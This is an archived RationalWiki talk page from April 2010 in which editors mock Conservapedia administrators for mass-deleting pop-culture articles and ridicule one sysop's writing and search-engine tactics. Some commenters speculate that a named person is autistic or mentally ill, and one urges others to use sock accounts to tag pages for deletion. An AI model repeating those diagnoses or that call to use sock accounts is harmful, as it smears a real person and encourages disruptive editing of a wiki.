06:29, 21 April 2010 (UTC) Here are a few of my favorites from the dozens deleted this week: 21 April 2010 DouglasA deleted "System of a Down" (Pop Culture) 21 April 2010 DouglasA deleted "Gladys Knight" (Pop Culture) 21 April 2010 DouglasA deleted "Nirvana (Band)" (Creation of Troublemaker/Troll/Liar) 21 April 2010 DouglasA deleted "Pearl Jam" (Creation of Troublemaker/Troll/Liar) 20 April 2010 JacobB deleted "Sonic the Hedgehog" (Pop Culture) 20 April 2010 JacobB deleted "Sega Genesis" (Pop Culture) 20 April 2010 Jpatt deleted "LEGO" (Pop Culture) 18 April 2010 DouglasA deleted "SimCity (Video game)" (Pop Culture) 16 April 2010 TK deleted "Breath of Fire Series" (Creation of Troublemaker/Troll/Liar: Pop Culture) They also delete pages on books they don't like: 15 April 2010 Conservative deleted "The Greatest Show on Earth" (content was: The Greatest Show on Earth: The Evidence for Evolution is a book by Richard Dawkins published in 2009) and websites they don't like: 8 April 2010 TK deleted "Storehouse of Knowledge" (Previously deleted by Admin, now recreated again) and did Conservative re-create, then delete Hoji's page just to send a shout-out to him? Hasn't he been gone for 2 or 3 years? 14 April 2010 Conservative deleted "User talk:Hojimachong" (content was: 'The Conservapedia growing prominence on the evolution issue on the Unites States internet is coming along nicely don't you think? Bada boom! Bada [htt…' (and the only contributor was 'Conservative')) Bored much? Or should that be obsessive much? Refugeetalk page 06:40, 21 April 2010 (UTC) - Ken keeps restoring pages and then deleting them, which leaves me to believe he does not know how to view delete revisions of a page. It never ceases to amaze me that he has been a sysop on a wiki longer than I have been using them. - π 07:03, 21 April 2010 (UTC) - Heh heh, Dougie and Jake are going mental! Nice work boys! After you've deleted most of their articles, please work on getting TK out of there so the rest of us can have some fun! DeltaStarSenior SysopSpeciationspeed! 08:45, 21 April 2010 (UTC) - They still haven't deleted 'The Killers'. EddyP (talk) 09:14, 21 April 2010 (UTC) - If anyone has any active socks, get on there and stick those 'speedy deletion' tags on everything you can find ('pop culture' only of course)! DeltaStarSenior SysopSpeciationspeed! 09:17, 21 April 2010 (UTC) - But the good stuff still remains. As we all know, non-German composers and musicians aren't worth shit, so there's no point in having articles about them. Röstigraben (talk) 10:09, 21 April 2010 (UTC) - Someone needs to put their favourite pic of their favourite German on that article. DeltaStarSenior SysopSpeciationspeed! 10:32, 21 April 2010 (UTC) What I thought was telling was TK's deletion of Victor Jara as "unencyclopedic" for being just a musician, I guess. Of course, Jara was sort of the Chilean Woody Guthrie, and was murdered by Pinochets forces, so he's a little more significant than that chick who sings about her milkshake bringing boys to the yard. DickTurpis (talk) 12:20, 21 April 2010 (UTC) - Hey, I liked my BoF article. I find that it was a neat addition to 'Video Games' about how religious terms are used in video games [2 and 3 directly pose 'God' as the enemy, while 4 refers to a 'God-Emperor'] and was useful to parents looking for games for their kids. -- CodyH (talk) 13:56, 21 April 2010 (UTC) - I found another 3! This one and the two links contained therein. And two here and these. EddyP (talk) 14:12, 21 April 2010 (UTC) - This isn't going to sit well with Uncle Ed. Röstigraben (talk) 15:33, 21 April 2010 (UTC) - I noticed that CP's {{speedy}} template's source has a hard-wired value, and they use a different template if you want to give a reason. Don't they know how to create templates with default values? CS Miller (talk) 18:40, 21 April 2010 (UTC) - Keep in mind that some of these templates date back to the first days of CP - things had been very unorganized, and few people had solid wikiknowledge. And by the time we could've worried about these things, we had different problems and priorities. And nowadays, all templates are locked and major template edits have to be requested and justified in advance. Not that many people would seriously consider to do so - it's work (even more so with the requesting/justifying procedure) and it's utterly thankless. The only edits that count in your favor are the ones that echo Andy's thoughts and "insights", so why should anybody bother with such maintenance? --Sid (talk) 18:55, 21 April 2010 (UTC) - As for the sysops (who don't have to constantly justify their existence by kissing Andy's feet), several of them are incompetent, and the few who could are too busy with their pet projects or with banning and deleting editors. --Sid (talk) 18:58, 21 April 2010 (UTC) - Ya know what? When Conservapedia started, a pile of experienced Wikipedians offered to come on board and help out with technical stuff. Even ones who disagreed with his political and religious stance. Because they were nice people and wanted to help a new wiki out. He kicked off all the ones who stuck around longer than a month or two, of course - David Gerard (talk) 19:52, 21 April 2010 (UTC) - True enough. CP is self-defeating, and now they are just getting ridiculous. Not only are they deleting good pages, they are also creating pages on subjects they already have. CP has had an existing page about Christmas since 2007 but inexplicable today Aschlafly made another (stub) article, same subject. Refugeetalk page 07:22, 23 April 2010 (UTC) You gotta love Ken's writing style[edit] The other gem in Ken's horribly written screed is his failure in WWII history. "We may soon have our Lieutenant General, but if you're looking for a lesser position you can try out for Supreme Allied Commander Europe or Supreme Commander of he Allied Powers." Way to go. DickTurpis (talk) 12:03, 22 April 2010 (UTC) - I know it's amateur psychology but I honestly think Ken is lacking some part of what makes an sane adult. I thought he might be trying to game the search engines with some of his repetitive stuff but he's the same everywhere. See here for instance (from 2006). The man isn't all there and should be in secure accommodation where he can be cared for IMHO. 12:11, 22 April 2010 (UTC) yummy & honey(or marmalade) - Is there really any doubt that Ken is at least mildly autistic, or something along those lines? I sometimes feel bad making fun of him because of it, but it's so hard not to. DickTurpis (talk) 17:31, 22 April 2010 (UTC) - Ken likely has real problems which I don't think should be the subject of jokes. — Sincerely, Neveruse / Talk / Block 17:37, 22 April 2010 (UTC) - "Cockaddled"--Opcn (talk) 17:43, 22 April 2010 (UTC) - @Neveruse: I tend to agree but neither should he be given a platform to demonstrate his problem, especially on an "educational" website. As long as Andy panders to him, we have a duty to pillory him. 20:28, 22 April 2010 (UTC) yummy & honey(or marmalade) I just want to be part of this section. I enjoy reading Ken being schooled on his content-free "arguments". ħuman 21:26, 22 April 2010 (UTC) - Liar. You just wanted to use the cool new unindent template. Keegscee (talk) 21:48, 22 April 2010 (UTC) - Oh man, that template's awesome! Er...and Ken's a jerk or something. -- YossarianThe Man from the USSR 22:18, 22 April 2010 (UTC) EC) Fuck off Mei That should be elsewhere. - Ant-abortion project: "In addition, it is important that the articles be original and not created by merely cutting and pasting content from other websites."img Yup, don't want any of those naughty quote mines, Ken. 23:53, 22 April 2010 (UTC) yummy & honey(or marmalade) Ken's list of abortion-related articles is staggering in its inanity - Abortion in Scotland (WTF!) - Catholic views on abortion - Protestant views on abortion - Anglican views on abortion - Religious views on abortion - American views on abortion - Democrat and Republican views on abortion - Political views on abortion - Barack Obama and abortion - Hillary Clinton and abortion - Abortion and Adolf Hitler Even if all the articles are un-redded then what we can expect is a humongous single page with all of these articles copy pasted into it and then links to the exact same text saying "See main Article on...". Lily Inspirate me. 02:12, 23 April 2010 (UTC) - These are all based on Google search terms. Realizing he has no chance of directing traffic to CP through the search "abortion" he is trying to chew up the next 100 most popular searches that include abortion. As there are few pages with those exact titles, he should expect to get top 5 result each time for that search terms. I also suspect that he is trying to give the impression to the search engine that this is a large resource on the topic and it will have a later effect of dragging up their abortion article, this is less likely to actually work, in the short term at least. - π 13:53, 23 April 2010 (UTC) - That's a good link that Toast, it's interesting to see Ken' 'work' before CP. As we're talking about Ken, here's a quote from that forum; Ken's scholarship is abysmal. He is, frankly, a stupid and dishonest person; and recognized as such right across the spectrum of diverse views represented in this forum.DeltaStarSenior SysopSpeciationspeed! 13:51, 23 April 2010 (UTC) - Here's a little game if you're bored. Look for the TOC in the cp:Abortion article. Lily Inspirate me. 01:58, 24 April 2010 (UTC)
https://rationalwiki.org/wiki/Conservapedia_talk:What_is_going_on_at_CP%3F/Archive178
CC-MAIN-2020-50
refinedweb
21,511
71.85
9317/how-to-set-up-hyperledger-fabric-v0-6-network-without-docker I would recommend that you look at ...READ MORE How to simple way to upgrade the ...READ MORE The peers communicate among them through the ...READ MORE There are two ways you can do ...READ MORE Summary: Both should provide similar reliability of ...READ MORE This will solve your problem import org.apache.commons.codec.binary.Hex; Transaction txn ...READ MORE To read and add data you can ...READ MORE In a Dev environment, you can first ...READ MORE You can learning writing java codes for ...READ MORE OR At least 1 upper-case and 1 lower-case letter Minimum 8 characters and Maximum 50 characters Already have an account? Sign in.
https://www.edureka.co/community/9317/how-to-set-up-hyperledger-fabric-v0-6-network-without-docker
CC-MAIN-2021-49
refinedweb
124
61.73
Opened 7 years ago Closed 4 years ago #12568 closed Bug (fixed) SubFieldBase descriptor object should be accessible Description Currently any field that has SubFieldBase as a metaclass will throw an exception if you try access the descriptor object without an instance. Things like the following can not be done with the current implementation: def _get_members_of_type(obj, member_type): """ Finds members of a certain type in obj. """ def filter_member_type(member): try: return type(member) is member_type except AttributeError: return False # if the type of obj is the metaclass for all models, just search in the object # because it is not a model instance but a type if type(obj) is ModelBase: key_hash = inspect.getmembers(obj, filter_member_type) else: key_hash = inspect.getmembers(obj.__class__, filter_member_type) return key_hash SubFieldBase will throw an AttributeError every time inspect.getmembers is used on a model instance or class. Normal behaviour would be to return the descriptor object when no instance is passed. All django's standard fields behave this way, so it would be best if SubFieldBase would do the same. I will attach a patch against current trunk. Attachments (3) Change History (15) Changed 7 years ago by comment:1 Changed 7 years ago by comment:2 Changed 7 years ago by comment:3 Changed 7 years ago by comment:4 Changed 7 years ago by 1.2 is feature-frozen, moving this feature request off the milestone. comment:5 Changed 7 years ago by I added a new patch + tests to fix this issue in 1.2 Please do not let descriptors break inspect, but instead behave like a proper property, which returns self when a descriptor is accessed without context: If you need the descriptor object itself to be inaccessible for some reason, just return None instead of self. This would also make more sense, an uninitialized property is None, just like a regular attribute. There are more places where the AttributeError is thrown, for instance ManagerDescriptor raises: AttributeError: Manager isn't accessible via MyModel instances When a model instance is inspected. ImageField and FileField also do it, which to me seems wrong. Changed 7 years ago by This time the test is also added comment:6 Changed 6 years ago by comment:7 Changed 5 years ago by Change UI/UX from NULL to False. comment:8 Changed 5 years ago by Change Easy pickings from NULL to False. Changed 4 years ago by Rebased against git master (5be56d0) comment:9 Changed 4 years ago by Any chance this can make it into an official release? I'm happy to polish up however needed, or take this to django-developers if it really needs discussion. Rebased patch against git master attached above, as a start. This bug causes an AttributeError when trying to use sphinx-autodoc on custom fields which have __metaclass__ = SubFieldBase, due to the underlying "must be accessed from instance" AttributeError. The equivalent ticket for fixing inspect() for Django's built-in fields was #8248, fixed in [9634] (~5 years ago). comment:10 Changed 4 years ago by Nice! comment:11 Changed 4 years ago by Any objections for adding this, seems like a good addition to me? More specific: SubFieldBase? will throw an AttributeError? every time inspect.getmembers is used on a model instance or class that has fields which use SubFieldBase.
https://code.djangoproject.com/ticket/12568
CC-MAIN-2017-22
refinedweb
552
61.77
] This was actually supposed to be a follow-up to my tests of startup performance of various desktop environments, primarily KDE of course :). One of bugzilla features is displaying various headlines, probably in order to cheer up the poor bugreporter or bughunter. KDE bugzilla actually doesn't seem to have this enabled, but I liked this in the old SUSE bugzilla, it had a nice collection of funny quips for the headlines. Those are gone now though after the switch to Novell bugzilla, which seems to prefer various encouraging quotes from famous people (I can't help it but sometimes they kinda remind me of the old communist times with their slogans). This? LWN has a very interesting article summing up Michael Meeks' work on improving shared libraries loading as a part of his work to improve OpenOffice.org startup times (his paper linked from the article is worth reading as well). And the dynsort and hashval optimizations that improve the data used while dynamically linking are finding their way into glibc as the --hash-style option.). In the times of DCOP disappearing from trunk ... KDE DCOP WMIface (and of course the matching entry at b.k.o that I apparently failed to handle somehow)? What would be the best comment ... shame on me? Every now and again you hear someone complaining about C++. You will probably also have heard that C sucks. The two statements are of course linked; the following code is valid C, but will never compile. a.c: #include "a.c" gcc bails out at the 200th recursion with the error message: In file included from a.c:1, a.c:1:15: error: #include nested too deeply I've omitted the two-hundred line long trace back through the other includes. Yes,. Or at least many people apparently think so. One just has to love all these people believing that KDE could definitely perform at least as good as Windows 98 (but preferably better of course) if we developers weren't just so damn lazy and finally fixed it during one of our coffee breaks. Coffee (or tea in my case) in one hand, magically snapping fingers on the other hand, probably. This place is a blogging platform for KDE contributors. It only hosts a fraction of KDE contributor's blogs. If you are interested in all of them please visit the agregator at Planet KDE.
https://blogs.kde.org/blogs/lubos-lunak?page=4
CC-MAIN-2017-43
refinedweb
401
63.7
Cookiecutter template for a Python namespace package Project description Cookiecutter Namespace Template for a Python package. - GitHub repo: - License: BSD license Features - Testing setup with unittest and python setup.py test or py.test - Tox testing: Setup to easily test for Python 2.7, 3.4, 3.5, 3.6 - Sphinx docs: Documentation ready for generation with, for example, ReadTheDocs - Bumpversion: Pre-configured version bumping with a single command - Optional auto-release to PyPI when you push a new tag to master (optional) - Optional command line interface using Click Quickstart Install the latest Cookiecutter if you haven’t installed it yet (this requires Cookiecutter 1.4.0 or higher): $ pip install -U cookiecutter Generate a Python package project: $ cookiecutter Create a repo and put it there. Register your project with PyPI. Add the repo to your ReadTheDocs account and turn on the ReadTheDocs service hook. Release your package by pushing a new tag to master. Pull requests If you have differences in your preferred setup, I encourage you to fork this to create your own version. I also accept pull requests on this, if they’re small, atomic, and if they make my own packaging experience better. Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/cookiecutter-namespace-template/
CC-MAIN-2018-39
refinedweb
220
55.34
Unraveling Strings in Visual C++ This is an article I wrote sometime in the late 1990's about working with strings coming from COM, MFC, Win32, the C++ Standard Library, etc. It does not include anything about .NET since it was written before .NET came out. Outline Why so many strings? When is each string appropriate? Using various strings Conversions between types Conclusion References Sample code Introduction In the good old days, a string was a pointer to a null-terminated array of chars. Period. Now a string might be a char*, wchar_t*, LPCTSTR, BSTR, CString, basic_string, _bstr_t, CComBSTR, etc. Unfortunately, you cannot simply choose your favorite string representation and ignore the rest. Each representation has its own domain and it is frequently necessary to convert between types when crossing domain boundaries. Why are there so many kinds of strings? When is each one appropriate? How do you carry out common tasks with each? How do they relate to each other? Why so many strings? Strings differ in three important ways: character set, memory layout, and conventions for use. The most obvious and simplest of these is character set. To keep things focused, we will limit ourselves to ANSI and Unicode. ANSI strings, the kind everybody grew up on, are arrays of single-byte characters. By far most of the world's strings are ANSI strings. So why bother with Unicode? Eight bits are plenty to represent all the characters of ordinary English text. But with the slightest thought to international software, it quickly becomes apparent that eight bits are woefully inadequate. Unicode, with 16 bits per character, has enough possibilities to cover all the world's major languages with enough characters left over to even throw in a few ancient languages for good measure. Windows NT was built from the beginning to use Unicode strings exclusively internally, though you may write applications for NT that use either ANSI or Unicode. Windows CE only understands Unicode. OLE is built around Unicode strings. But Windows 3.x “doesn't know Unicode from a dress code, and never will [1].” The same is true of Windows 9x. The ANSI vs. Unicode strings are much like the English vs. metric measurement units: most everyone agrees the latter is the way to go, but the former has a tremendous installed base. In both situations, we will probably have to live with two standards and all the concomitant complications for a very long time. C++ has two built in character types: char and wchar_t. Most commonly a char is an ANSI character and a wchar_t is a Unicode character. This is not always the case, but to simplify things a bit, we will make this assumption. Wide character strings, i.e. strings of wchar_ts, are null-terminated arrays of characters, directly analogous with ordinary strings. The terminating null character in this case is a wchar_t null. Incidentally, the default settings for the Visual C++ debugger are to not display Unicode characters. There is a check box under Tools / Options / Debug labeled "Display unicode strings" which turns this on. In order to be able to use the same source code for ANSI and Unicode builds, Windows introduced the TCHAR data type. TCHAR is simply a macro that expands to char in ANSI builds (i.e. _UNICODE is not defined) and wchar_t in Unicode builds ( _UNICODE is defined). There are various string types based on the TCHAR macro, such as LPCTSTR (long pointer to a constant TCHAR string). Microsoft also introduced a number of macros and typedefs with " OLE" in the name such as OLECHAR, LPOLESTR, etc. These are vestiges of an automatic ANSI / Unicode conversion scheme that Microsoft used prior to MFC 4.0 and has since abandoned. However, the names live on for legacy support and for Macintosh development. For example, if you look for help on CLSIDFromProgID you'll find that its first argument is an LPCOLESTR. For Win32 development, "OLE" corresponds to Unicode. For Win16 and for the Macintosh, the symbol OLE2ANSI is defined and " OLE" corresponds to ANSI. For example, in Win32 development, an OLECHAR is simply a wchar_t and an LPOLESTR is a wide character string. Microsoft?s character and string types may be summarized as follows. A character name has the form XCHAR and string name has the form LPCXSTR where C is optional and X is either T, OLE, W, or empty. The C indicates a string type is constant, and the X has the following meanings: MFC introduced the CString class as a wrapper around LPCTSTR data type which provides methods for common tasks such as memory allocation and substring searches. A CString can be used in most circumstances where you would use an LPCTSTR. The Standard C++ library provides a parameterized string class basic_string<T> where T is most often a char or wchar_t. The Standard library provides the typedefs string and wstring respectively for these common cases. The real confusion in string types comes when we introduce BSTRs. A BSTR differs from a common string in that it always uses Unicode, regardless of compiler switches. However, it also has a different layout in memory. Furthermore, there are different conventions for using BSTRs than for using simple null-terminated string, whether of the ANSI or Unicode variety, and these conventions are seldom codified. A BSTR is a null-terminated Unicode string, but with a byte count (not character count!) prepended. An advantage of a byte-count prefix is that BSTR can contain internal nulls, whereas an ordinary string may not. One unusual aspect of the BSTR is that the byte count is not in the 0th entry of the array the BSTR points to. Instead, the byte count is stored in the two bytes preceding the memory the pointer ostensibly points to. (MFC?s CString uses a similar trick so that passing a CString involves no more overhead than passing a pointer [2]. This causes no problems for developers, however, because the implementation is thoroughly encapsulated.) OLE standardized on the BSTR partially because of OLE's desire to be language-independent. Many languages use the counted arrays rather than using a special symbol to mark the end of a string. The BSTR compromises by requiring both a count and a terminating character. (Note that in the context of string and character types, OLE refers only to character widths. In particular, an LPOLESTR is simply a wide character string and not a BSTR. Despite the name, an LPOLESTR is not OLE's favorite string!) BSTRs are an unnatural imposition on C++. However, they are unavoidable because OLE is built around BSTRs and not native C++ strings. In order to make BSTR manipulation easier from C++, several wrapper classes have been created. One is ATL's CComBSTR class, which handles basic memory management and a few basic operations for strings. There is another BSTR wrapper which one must use in order to take advantage of the native COM support in the Visual C++ compiler. When you use the #import directive, the compiler creates wrapper functions for the methods on the imported COM interfaces. BSTR arguments and return values are wrapped as _bstr_t. (However, BSTR* arguments are left alone so the _bstr_t doesn't entirely eliminate the need to manipulate BSTRs.) The design goals of _bstr_t are different from that of CComBSTR. The former provides more convenience functions, and is implemented with reference counting to avoid unnecessary memory copying. When is each string appropriate? MFC class methods often take LPCTSTR arguments. The choice of a class wrapper for strings in MFC development is obviously CString especially because a CString can be used in most situations where an LPCTSTR is specified. The advantage of the CString class is that it provides many useful methods for memory management and string manipulation. One disadvantage is that CString carries with it a little bit more overhead than a raw LPCTSTR. Also, if CString is the only MFC class in a project, it still requires linking to and redistributing the MFC DLLs. The Standard C++ basic_string<> has the advantage of being portable to non-Windows platforms. Also, you may explicitly decide between char and wchar_t strings on an individual basis rather than deciding once and for all based on a compiler switch as with TCHAR strings. And you could use basic_string<TCHAR> to maintain the ANSI vs. Unicode flexibility of CString. Like CString, basic_string<> does define a large number of convenient string manipulation functions. A design goal of this string class was to make the class sufficiently convenient and efficient that it would seldom be necessary to use null terminated strings and the C library manipulation functions. In OLE interfaces, there is no choice but to use BSTR or one of its wrapper classes. Ordinarily, a C++ developer would use a BSTR only as a delivery vehicle to a COM interface; string manipulation is more easily done via library methods and wrapper classes native to C++. Because a BSTR may contain any characters, even internal nulls, it is possible to wrap arbitrary data in a BSTR to pass to another function (for example, to avoid having to write custom marshalling code for a COM interface). ATL's CComBSTR is a light-weight wrapper class with adequate functionality for common tasks, and is a natural choice for ATL development. The _bstr_t class is more complicated, but cannot be avoided when using the #import directive and the wrapper functions it creates. Using various strings The L symbol before a character literal denotes that the character is a wide character, as in wchar_t ch = L'a'; This designation is seldom necessary: the first 255 characters of Unicode are the same as ANSI. Had we left out the L in front of the first quote mark, the char 'a' would have been promoted to the wchar_t with the same value. The L symbol is also used to distinguish wchar_t strings from ordinary strings, as in wchar_t wsz = L"Unicode String"; Windows provides the macros _T() and _TEXT() which do nothing unless _UNICODE is defined, in which case they each expand to L. Hence _T("John") reverts to simply "John" in ANSI builds and expands to L"John" in Unicode builds. There is an analogous OLESTR macro that disappears if OLE2ANSI is defined and expands to L otherwise. For most of the Standard C library string routines, you can change the initial " str" in the name to " wcs" to determine the name of the corresponding routing for wide character strings. For example, wcscpy is the wide character counterpart of the venerable strcpy. Also, you may change " str" to " _tsc" to come up with the name of a corresponding TCHAR routine. Because a BSTR allocates memory before the location it nominally points to, a whole different API is necessary for working with BSTRs. For example, you may not initialize a BSTR by saying BSTR b = L"A String"; This will correctly initialize b to a wide character array, but the byte count is uninitialized and so b is not a valid BSTR. The proper way to initialize b is BSTR b = ::SysAllocString(L"A String"); Before b goes out of scope, its memory needs to be released by calling ::SysFreeString. Note that because the memory for BSTRs is allocated via a system call rather than the C++ new operator, memory leaks due to failing to call ::SysFreeString will not show up in the Visual C++ debugger. (NuMega's BoundsChecker will catch these leaks, however.) Two other handy functions for working with BSTRs are ::SysAllocStringLen and ::SysStringLen. The former allocates a string to a given length and the latter is analogous to the Standard C strlen. The subtlest difficulty with using BSTRs is that they have conventions for their use that differ from those of other strings. For example, a NULL BSTR is treated as a valid, zero-length string unlike an ordinary string. The only place I have seen anyone attempt to codify these conventions is in Bruce McKinney's excellent article cited earlier. The reader is advised to study the section of his article entitled "The Eight Rules of BSTR." The CComBSTR wrapper is straightforward to use. It does not have a lot of methods, but the ones it has are simple and self-explanatory. The _bstr_t class is more complex. It has more convenience functions. It reference-counts memory to avoid unnecessary copying and throws exceptions. CComBSTR does no reference counting and does not throw exceptions. Conversions between types Developers frequently work in the intersection of two or more cultures. You may be writing an OLE application using Standard C++, MFC and ATL. But OLE, Standard C++, MFC, and ATL represent four different cultures, each with its own preferred string type or string wrapper class. Therefore an important part of working with strings is knowing how to convert between the various manifestations. Because a BSTR is null-terminated and because its pointer points past the byte count, a BSTR "is a" (in an inheritance sort of sense) wide character string. You may pass a BSTR to a function expecting a wchar_t*. (Of course, if the BSTR being passed in contains any internal nulls, data after the first null will be lost in the interpretation as a wide character string.) However, this interchangeability with wide character strings is tricky. You cannot always look at a variable and tell whether a wchar_t* is merely a null-terminated wide character string or whether in fact it is a BSTR. The source code for _bstr_t is a good example. There is an operator _bstr_t::operator const wchar_t* which implies only that you may pass a _bstr_t to a function expecting a const wchar_t*. However, reading the implementation code, you discover that the const wchar_t* in question is actually a full-fledged BSTR. As McKinney points out, "a BSTR is a BSTR by convention" and not a built-in type that the compiler can check. The header file atlconv.h contains a whopping 28 conversion macros for converting between the various non-class string types covered in this article. These macros have the form X2Y. The source type X can be A, T, W, or OLE for ANSI, TCHAR, wchar_t or OLE respectively. The destination type Y can be any of these types or additionally BSTR. Except for BSTR, the destination types may optionally have a C in front of their type to indicate const. For example, A2CW takes an ANSI string and returns a constant wide character string. Of course, there are no macros for converting a type to itself. Note that there is no need for a BSTR source type because you may use a BSTR as a wide character string. Some of these macros require that you first call the macro USES_CONVERSION while others do not. Note that unlike most macros, USES_CONVERSION must be followed by a semicolon. Except when converting to a BSTR, these macros allocate memory on the stack; BSTRs are always allocated by a system call and must be freed using ::SysFreeString. CString defines a constructor and an operator= that each take an LPCTSTR argument. In particular, you can pass an LPCTSTR into a function taking a CString. CString also provides an operator LPCTSTR and so you can also pass a CString to a function expecting an LPCTSTR. CString has a method AllocSysString that produces a BSTR from its contents. Finally, CString can take a LPCWSTR (a const wchar_t*) as an argument to either a constructor or to operator=. The basic_string<T> class has constructor and operator= methods which take a const T* argument. However, you cannot pass a basic_string<T> to a function expecting a const T* because basic_string<> extracts to a character string via an operator called c_str() rather than via a type conversion operator. CComBSTR has both a constructor and an operator= which take a BSTR argument, as well as a type conversion operator for BSTR. Thus CComBSTR has roughly the same relationship with BSTR as CString has with LPCTSTR. The class _bstr_t has constructor and operator= overloads that take either ANSI or wide character strings. Also, it supports type conversion operators to both kinds of strings. As noted earlier, the type conversion operator for wide character strings actually returns a BSTR. Therefore you can pass or receive a _bstr_t as an ANSI string or a BSTR. Conclusion Developers these days have to contend with at least two character sets — ANSI and Unicode — and at least two memory representations — null terminated and count prepended. This alone makes multiple string types inevitable. Macros and wrapper classes simplify the situation in some circumstances, but they also add their own complexity. The Visual C++ developer stands in the intersection of a number of programming idioms — traditional C, Standard C++, MFC, COM, ATL — each with its own favorite string representation. You cannot avoid working with numerous string representations and converting from one to another. It is important to understand how each works and the implicit conventions for working with each type. References 1. Bruce McKinney, Strings the OLE Way, available on MSDN. 2. Jim Beveridge, CString: Part of the plumbing behind MFC and a model for efficient design, Visual C++ Developers Journal, Volume 1 Number 4. Sample code #include <afxpriv.h> // for USES_CONVERSION #include <comdef.h> // for _bstr_t CString cs; BSTR bstr; WCHAR wsz[81]; CComBSTR cbstr; char sz[81]; TCHAR tsz[81]; basic_string<char> bs; _bstr_t _bstr; USES_CONVERSION; // Convert CString to various types cs = "String1"; bstr = cs.AllocSysString(); // BSTR _tcscpy(tsz, (LPCTSTR)cs); // LPCTSTR strcpy(sz, T2A(tsz)); // ANSI string wcscpy(wsz, bstr); // wide string cbstr = bstr; // CComBSTR via bs = sz; // STL string _bstr = (LPCTSTR) cs; // _bstr_t via either // operator=(const char*) or // operator=(const wchar_t*) // if _UNICODE is defined. ::SysFreeString(bstr); // Convert BSTR to various types bstr = ::SysAllocString(L"String2"); cs = bstr; // CString via its LPCWSTR ctor wcscpy(wsz, bstr); // Unicode cbstr = bstr; // CComBSTR via operator=(LPOLESTR) strcpy(sz, W2A(bstr)); // ANSI string bs = sz; // STL string operator=(const T*) _tcscpy(tsz, W2T(bstr)); // LPTSTR _bstr = bstr; // _bstr_t via operator=(const wchar_t*) ::SysFreeString(bstr); Other C++ articles: - Regular expressions - Random number generation - Floating point exceptions - Math.h in Visual Studio, POSIX, and ISO
http://www.johndcook.com/cplusplus_strings.html
CC-MAIN-2013-20
refinedweb
3,026
63.29
Overview This article shows you how to leverage built-in Java classes to read a file line-by-line. The goal is to simply display a file "line by line," but these techniques could easily be extended for any purpose that involves reading a large file line by line, such as a database import from a large text file. While <CFFILE> could be used for this purpose, <CFFILE> reads the entire file into memory at once, which could cause severe memory problems on the server hosting ColdFusion. Fortunately, ColdFusion makes accessing Java classes, such as Java's FileReader and BufferedReader classes, simple and easy. To read a file line-by-line in Java, you would typically create a FileReader object, then pass that object to BufferedReader and use the BufferedReader.readLine( ) method to read the file, line by line. Extending a Java Class A slight problem occurs when using BufferedReader.readLine( ) from ColdFusion. When BufferedReader reaches the end of the file, the readLine( ) method returns a Java null value. However, ColdFusion does not have an equivalent to a Java null (or a database null), so ColdFusion instead returns an empty (zero-length) string. We are left with no way to differentiate between a blank line in the file and the null returned by readLine( ) when it reaches the end of the file. (More information on BufferedReader can be found at:) The solution is to create a subclass of BufferedReader in Java and use it instead. We will name that class "CFBufferedReader," and its job will be to keep track of the responses from BufferedReader to detect the Java null that signals the end of the file, making that value accessible from ColdFusion via a different method we'll call isEOF( ). Here is our commented Java source (CFBufferedReader.java): //CFBufferedReader// Purpose:// Since ColdFusion automatically turns "null" Strings into empty strings,// it is necessary to extend BufferedReader so that we can detect// the null string returned from readLine().//// Use:// CFBufferedReader works exactly like java.io.BufferedReader,// but adds an isEOF() method to indicate whether the last call// to readLine detected the end of the file.//// Author:// Daryl Banttari (Macromedia)//// Copyright: (c)2001 Macromedia// Feel free to use this for any purpose, with or without inclusion// of this copyright notice, so long as you agree to hold Macromedia// completely harmless for any use of this code.// We are using several classes from java.io,// so import everything under java.io:import java.io.*;// Define this class as a subclass of java.io.BufferedReaderpublic class CFBufferedReader extends java.io.BufferedReader { // variable to hold the EOF status of the last read // default to false; we'll assume you're not at eof if // we haven't read anything yet private boolean eof = false; // our class constructors will simply pass the arguments // through to our superclass, BufferedReader: public CFBufferedReader(Reader in, int sz) { // "super" is an alias to the superclass. // calling super() in this fashion actually // invokes the superclass' constructor method. super(in, sz); } public CFBufferedReader(Reader in) { super(in); } // here we extend the readLine method: public String readLine() throws java.io.IOException { String curLine; // call the "real" readLine() method from the superclass curLine = super.readLine(); // now set eof to "is curline null?" // note that there are two equals signs between "curLine" and "null" eof = (curLine == null); // return curline to the caller "as is" return curLine; } public boolean isEOF() { // simply return the current value if the eof variable return eof; } } Our next step is to place the Java source code file, CFBufferedReader.java, someplace where we can find it. I have Java installed in C:\jdk1.3.1\, so I'll place the file in C:\jdk1.3.1\jre\lib\ . Now compile it. In the example below, I've used the verbose option; without it, javac emits no messages, which can be unsettling: C:\jdk1.3.1\jre\lib>C:\jdk1.3.1\bin\javac -verbose CFBufferedReader.java[parsing started CFBufferedReader.java][parsing completed 120ms][loading C:\jdk1.3.1\jre\lib\rt.jar(java/io/BufferedReader.class)][loading C:\jdk1.3.1\jre\lib\rt.jar(java/io/Reader.class)] C:\jdk1.3.1\jre\lib> This creates our "compiled" class file, CFBufferedReader.class. Configuring ColdFusion for Java The next step is to configure ColdFusion to load the Java VM properly. This step is done from the "JVM and Java Settings" tab of the ColdFusion Administrator. Remember: my Java installation is in C:\jdk1.3.1\. If your Java installation is in a different directory, or if you are running on a non-Windows platform, you will need to set these values accordingly. More information on this can be found in the ColdFusion online documentation set "Installing and Configuring ColdFusion Server" under the topic "Basic ColdFusion Server Administration," "Extensions." (If you're running a Unix variant, you should also review our knowledgebased article 20198 at:) The settings that I used are as follows: Java Virtual Machine Path: C:\jdk1.3.1\jre\bin\hotspot\jvm.dll Class Path: C:\jdk1.3.1\jre\lib\ Using Java to Read the File At this point, I will create a ColdFusion template, "javaFileTest.cfm." This template creates a Java FileReader object that allows us to read a file byte by byte. We will then pass that FileReader object to our CFBufferedReader object, and then use CFBufferedReader.readLine( ) to automagically read the file line by line. In this example, the template will read itself (using cgi.cf_template_path to get its full path and filename), and then display each line after replacing "<" with "<": <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Java File Example</title> </head> <body> <!--- get our filename from the CGI environment ---> <cfset fn = cgi.cf_template_path> <!--- create a Java FileReader object to read this file ---> <!--- note that java.io.FileReader is a native Java class.---> <cfobject type="Java" class="java.io.FileReader" name="fr" action="create"> <!--- when calling Java from CF, the constructor is called "init()" ---> <cfset fr.init(fn)> <!--- now pass the FileReader object to our extended BufferedReader ---> <cfobject type="Java" class="CFBufferedReader" name="reader" action="create"> <cfset reader.init(fr)> <!--- read the first line from the file ---> <cfset 